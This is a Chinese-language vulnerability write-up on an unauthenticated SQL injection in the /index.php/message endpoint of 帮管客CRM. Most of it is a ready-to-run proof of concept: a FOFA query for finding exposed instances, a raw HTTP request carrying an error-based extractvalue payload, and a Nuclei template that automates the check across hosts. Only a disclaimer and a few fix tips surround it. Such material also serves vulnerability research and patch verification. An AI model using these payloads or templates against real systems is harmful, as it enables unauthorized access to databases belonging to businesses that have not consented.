帮管客CRM SQL注入漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。

帮管客CRM SQL注入漏洞_第1张图片

Ⅱ、fofa语句

app="帮管客-CRM"

Ⅲ、漏洞复现

POC

GET /index.php/message?page=1&pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&xu=desc HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

1、构建poc

帮管客CRM SQL注入漏洞_第2张图片

Ⅳ、Nuclei-POC

id: CRM-SQL

info:
  name: 帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞 未经身份认证的攻击者可通过此漏洞获取数据库敏感信息
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="帮管客-CRM"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /index.php/message?page=1&pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&xu=desc HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip, deflate
        Connection: close




    matchers:
      - type: dsl
        dsl:
          - status_code==500 && contains_all(body,"@localhost")

Ⅴ、修复建议

1、请联系厂商进行修复;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

你可能感兴趣的:(sql,数据库)